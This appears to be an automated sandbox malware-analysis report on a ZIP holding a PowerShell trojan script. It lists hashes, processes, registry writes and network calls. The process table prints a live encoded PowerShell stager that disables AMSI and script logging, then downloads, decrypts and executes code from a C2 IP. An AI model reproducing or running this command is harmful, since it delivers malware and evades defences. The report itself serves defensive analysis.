| File name: | 207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.zip |
| Full analysis: | https://app.any.run/tasks/227dacbc-8663-4250-a72d-d541c3baea1d |
| Verdict: | Malicious activity |
| Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
| Analysis date: | September 30, 2020, 08:11:49 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | D32D075EBD145076269BB73C7C110EAE |
| SHA1: | 900B7455F2FBE345332DA003E3A19C738BC1CDB2 |
| SHA256: | 2FD1D4B9DC542CCC411BF576C3C46292B48435DFC668CFA4302CC40F0B1FFC5C |
| SSDEEP: | 48:91/3Jy99DVdVkKbu/H4WHZmN3qmusaYaXnrHx5lppInt2/3B:D3JGnkKSwyENaZsfknrHx/rIts3B |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0003 |
| ZipCompression: | Unknown (99) |
| ZipModifyDate: | 2020:09:30 08:11:06 |
| ZipCRC: | 0xfd607d7a |
| ZipCompressedSize: | 2180 |
| ZipUncompressedSize: | 5127 |
| ZipFileName: | 207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.ps1 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 584 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| 2284 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -Noninteractive -windowstyle hidden -e SQBmACgAJABQAFMAVgBlAHIAcwBpAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBFAHIAUwBJAE8ATgAuAE0AQQBKAE8AUgAgAC0ARwBFACAAMwApAHsAJAA2ADQARAA9AFsAcgBFAGYAXQAuAEEAUwBTAEUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA2ADQARAApAHsAJAA3ADQANwA9ACQANgA0AGQALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AdQBMAEwAKQA7AEkAZgAoACQANwA0ADcAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA3ADQANwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA3ADQANwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8AbABMAEUAQwBUAGkATwBOAHMALgBHAEUATgBFAHIASQBjAC4ARABJAGMAdABJAG8ATgBhAFIAWQBbAFMAdAByAGkAbgBnACwAUwB5AHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA3ADQANwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEAbAB9AEUATABzAEUAewBbAFMAQwByAEkAcAB0AEIATABPAGMASwBdAC4AIgBHAEUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAdQBlACgAJABOAHUAbABMACwAKABOAEUAVwAtAE8AYgBKAGUAQwB0ACAAQwBPAGwATABlAGMAVABpAE8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEgAYQBzAEgAUwBlAFQAWwBTAHQAcgBJAG4ARwBdACkAKQB9ACQAUgBlAEYAPQBbAFIARQBmAF0ALgBBAHMAcwBlAG0AYgBMAHkALgBHAGUAdABUAHkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUAZgAuAEcAZQB0AEYAaQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAdQBFACgAJABOAHUATABMACwAJABUAFIAdQBFACkAOwB9ADsAWwBTAFkAUwB0AGUAbQAuAE4AZQB0AC4AUwBFAHIAVgBpAGMARQBQAG8AaQBuAFQATQBhAG4AQQBnAEUAUgBdADoAOgBFAHgAUABlAEMAVAAxADAAMABDAG8ATgBUAGkAbgBVAGUAPQAwADsAJAAxADQAZQA9AE4AZQBXAC0ATwBCAGoARQBjAHQAIABTAFkAUwB0AEUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQBYAFQALgBFAE4AQwBPAGQASQBOAGcAXQA6ADoAVQBuAEkAYwBPAEQARQAuAEcARQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgBWAGUAUgB0AF0AOgA6AEYAcgBvAE0AQgBhAFMARQA2ADQAUwBUAFIAaQBOAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBOAHcAQQA2AEEARABnAEEATQBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAAxADQARQAuAEgARQBhAGQAZQBSAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADEANABlAC4AUABSAG8AWAB5AD0AWwBTAFkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAUgBFAFEAdQBlAFMAVABdADoAOgBEAEUAZgBBAFUATAB0AFcAZQBCAFAAcgBPAFgAWQA7ACQAMQA0AEUALgBQAHIATwB4AHkALgBDAFIAZQBkAEUATgB0AGkAQQBMAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AQwByAGUAZABlAG4AVABpAGEATABDAGEAQwBIAEUAXQA6ADoARABFAEYAQQBVAEwAVABOAGUAdABXAG8AUgBLAEMAcgBFAGQAZQBOAHQAaQBhAEwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAxADQAZQAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAdABFAG0ALgBUAGUAWAB0AC4ARQBuAEMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQBUAGUAcwAoACcANwBnAGkAZQBDAFcANABzAEcAVQBWAHcAYgBJAHYAKgB6AG0AfABTAFgANgBFAE8AXwA5AEEAbAAlADAAbwBOACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAMQA0AGUALgBIAEUAYQBEAEUAcgBTAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAE0AZQBBAEUAagBrAEwAawBBAHYAWgBjAEcASwBVAD0AbwBBAHgAaABMAHEARAB5ADkANwBDACsAVgBqAEoAOAA3AFcARgBFAEoAMgB3ACsAegBEAEkAPQAiACkAOwAkAGQAYQB0AEEAPQAkADEANABFAC4ARABPAFcAbgBsAE8AQQBEAEQAYQB0AGEAKAAkAFMAZQByACsAJABUACkAOwAkAEkAdgA9ACQAZABhAFQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQAZABBAFQAQQBbADQALgAuACQARABhAFQAYQAuAGwAZQBuAGcAVABoAF0AOwAtAGoAbwBpAG4AWwBDAGgAQQByAFsAXQBdACgAJgAgACQAUgAgACQARABhAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2992 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.zip | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop | |||
| (PID) Process: | (584) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface |
| Operation: | write | Name: | ShowPassword |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UOSDNA8ELZEPEIOMTRCY.temp | — | |
MD5:— | SHA256:— | |||
| 2284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8AE4P0UZ54WHR1TDSWTC.temp | — | |
MD5:— | SHA256:— | |||
| 2284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bfa7e.TMP | binary | |
MD5:— | SHA256:— | |||
| 2284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bf7fd.TMP | binary | |
MD5:— | SHA256:— | |||
| 2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 584 | WinRAR.exe | C:\Users\admin\Desktop\207def04d79d68a690c846c06b1f1c2b7083b573b4da14be9a08ea4e0900d42c.ps1 | text | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2284 | powershell.exe | GET | — | 206.189.140.177:80 | http://206.189.140.177/news.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2284 | powershell.exe | 206.189.140.177:80 | — | — | US | malicious |